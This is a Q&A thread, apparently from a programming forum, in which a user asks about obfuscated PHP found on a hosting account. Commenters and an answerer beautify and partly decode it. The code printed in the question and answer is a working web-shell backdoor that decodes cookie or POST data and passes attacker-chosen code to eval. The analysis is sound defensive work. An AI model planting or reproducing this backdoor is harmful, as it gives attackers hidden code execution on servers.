# what's this malicious code for?

Tags: php

I've found this code on a hosting, it appears that it's written by hacker, what is this code for?

```
<?php $zbsdho = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';$ivlmhe = Array();$ivlmhe[] = $zbsdho[34].$zbsdho[32];$ivlmhe[] = $zbsdho[1].$zbsdho[24].$zbsdho[21].$zbsdho[17].$zbsdho[20].$zbsdho[13].$zbsdho[4].$zbsdho[0].$zbsdho[26].$zbsdho[3].$zbsdho[20].$zbsdho[17].$zbsdho[31].$zbsdho[26].$zbsdho[0].$zbsdho[0].$zbsdho[20].$zbsdho[20].$zbsdho[26].$zbsdho[7].$zbsdho[7].$zbsdho[27].$zbsdho[3].$zbsdho[26].$zbsdho[27].$zbsdho[3].$zbsdho[24].$zbsdho[17].$zbsdho[14].$zbsdho[14].$zbsdho[6].$zbsdho[3].$zbsdho[14].$zbsdho[20].$zbsdho[4].$zbsdho[14];$ivlmhe[] = $zbsdho[15];$ivlmhe[] = $zbsdho[14].$zbsdho[18].$zbsdho[16].$zbsdho[22].$zbsdho[9];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[28].$zbsdho[12].$zbsdho[17].$zbsdho[23].$zbsdho[17].$zbsdho[21].$zbsdho[9];$ivlmhe[] = $zbsdho[17].$zbsdho[33].$zbsdho[23].$zbsdho[29].$zbsdho[18].$zbsdho[24].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[16].$zbsdho[7].$zbsdho[30].$zbsdho[9].$zbsdho[12];$ivlmhe[] = $zbsdho[21].$zbsdho[12].$zbsdho[12].$zbsdho[21].$zbsdho[2].$zbsdho[28].$zbsdho[11].$zbsdho[17].$zbsdho[12].$zbsdho[10].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[29].$zbsdho[17].$zbsdho[22];$ivlmhe[] = $zbsdho[23].$zbsdho[21].$zbsdho[14].$zbsdho[8];foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf){function ogehexx($ivlmhe, $owoafjz, $oibsdj){return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);}function lxasj($ivlmhe, $arihtmu){return @$ivlmhe[9]($ivlmhe[0], $arihtmu);}function jxlby($ivlmhe, $arihtmu){$flgqwzt = $ivlmhe[3]($arihtmu) % 3;if (!$flgqwzt) {eval($arihtmu[1]($arihtmu[2]));exit();}}$nunarwf = lxasj($ivlmhe, $nunarwf);jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));}
```

Comment: Ask the hacker. It's quite obvious that whoever wrote it does not want you to know by reading it, so asking is the only way as I see it.

Comment: I'm voting to close this question as off-topic because it's impossible to answer and the question and answers has little use for the future.

Comment: You could start by indenting it correctly and look at the execution. A lot of obfuscation is going on to make it hard to decrypt, but if you take your time and alter it to be more readable it can become trivial to figure it out.

Comment: I doubt if it is written by somebody - "hard to read" code structure implies that code probably was auto-generated by some tool (obfuscator or something) which may be coded by hacker or used already integrated into some product

Comment: hm... according to @Liam G's answer, seems that these crazy bunch of array constructions are required to build function names dynamically to be called later in code. And this `9dae5f74-85e2-4455-bb08-08decc38c57c` smells like code checksum or code version GUID number. These things indirectly confirms, that this code was auto-generated by some tool.

Answer (score 8, accepted):

First start off by beautifying the code:

```
<?php
$zbsdho   = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';
$ivlmhe   = Array();
$ivlmhe[] = $zbsdho[34] . $zbsdho[32];
$ivlmhe[] = $zbsdho[1] . $zbsdho[24] . $zbsdho[21] . $zbsdho[17] . $zbsdho[20] . $zbsdho[13] . $zbsdho[4] . $zbsdho[0] . $zbsdho[26] . $zbsdho[3] . $zbsdho[20] . $zbsdho[17] . $zbsdho[31] . $zbsdho[26] . $zbsdho[0] . $zbsdho[0] . $zbsdho[20] . $zbsdho[20] . $zbsdho[26] . $zbsdho[7] . $zbsdho[7] . $zbsdho[27] . $zbsdho[3] . $zbsdho[26] . $zbsdho[27] . $zbsdho[3] . $zbsdho[24] . $zbsdho[17] . $zbsdho[14] . $zbsdho[14] . $zbsdho[6] . $zbsdho[3] . $zbsdho[14] . $zbsdho[20] . $zbsdho[4] . $zbsdho[14];
$ivlmhe[] = $zbsdho[15];
$ivlmhe[] = $zbsdho[14] . $zbsdho[18] . $zbsdho[16] . $zbsdho[22] . $zbsdho[9];
$ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[28] . $zbsdho[12] . $zbsdho[17] . $zbsdho[23] . $zbsdho[17] . $zbsdho[21] . $zbsdho[9];
$ivlmhe[] = $zbsdho[17] . $zbsdho[33] . $zbsdho[23] . $zbsdho[29] . $zbsdho[18] . $zbsdho[24] . $zbsdho[17];
$ivlmhe[] = $zbsdho[30] . $zbsdho[16] . $zbsdho[7] . $zbsdho[30] . $zbsdho[9] . $zbsdho[12];
$ivlmhe[] = $zbsdho[21] . $zbsdho[12] . $zbsdho[12] . $zbsdho[21] . $zbsdho[2] . $zbsdho[28] . $zbsdho[11] . $zbsdho[17] . $zbsdho[12] . $zbsdho[10] . $zbsdho[17];
$ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[29] . $zbsdho[17] . $zbsdho[22];
$ivlmhe[] = $zbsdho[23] . $zbsdho[21] . $zbsdho[14] . $zbsdho[8];
foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf) {
    function ogehexx($ivlmhe, $owoafjz, $oibsdj)
    {
        return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);
    }
    function lxasj($ivlmhe, $arihtmu)
    {
        return @$ivlmhe[9]($ivlmhe[0], $arihtmu);
    }
    function jxlby($ivlmhe, $arihtmu)
    {
        $flgqwzt = $ivlmhe[3]($arihtmu) % 3;
        if (!$flgqwzt) {
            eval($arihtmu[1]($arihtmu[2]));
            exit();
        }
    }
    $nunarwf = lxasj($ivlmhe, $nunarwf);
    jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));
}
```

Then we find the values located in `$ivlmhe`:

```
array(10) { 
[0]=> string(2) "H*" 
[1]=> string(36) "9dae5f74-85e2-4455-bb08-08decc38c57c" 
[2]=> string(1) "#" 
[3]=> string(5) "count" 
[4]=> string(10) "str_repeat" 
[5]=> string(7) "explode" 
[6]=> string(6) "substr" 
[7]=> string(11) "array_merge" 
[8]=> string(6) "strlen" 
[9]=> string(4) "pack" 
}
```

Then:

```
foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
    function ogehexx($ivlmhe, $key, $oibsdj)
    {
        return substr(str_repeat($key . "9dae5f74-85e2-4455-bb08-08decc38c57c", ($oibsdj / strlen($key)) + 1), 0, $oibsdj);
    }
    function lxasj($ivlmhe, $arihtmu)
    {
        return @pack("H*", $arihtmu);
    }
    function jxlby($ivlmhe, $arihtmu)
    {
        $flgqwzt = count($arihtmu) % 3;
        if (!$flgqwzt) {
            eval($arihtmu[1]($arihtmu[2]));
            exit();
        }
    }
    $value = lxasj($ivlmhe, $value);
    jxlby($ivlmhe, explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value))));
}
```

That's all I've been able to decode so far, they are interested in the `$_COOKIE` & `$_POST` variables and perform various functions on them.

I made an error in the `jxlby` function originally, I have changed it to what it should be... the `eval()` within this function will be the nasty part, but I am finding it very difficult to figure out what exactly is being evaluated as the input for this function `$arihtmu` comes from this line which has a bitwise Xor operator in it `explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value)))`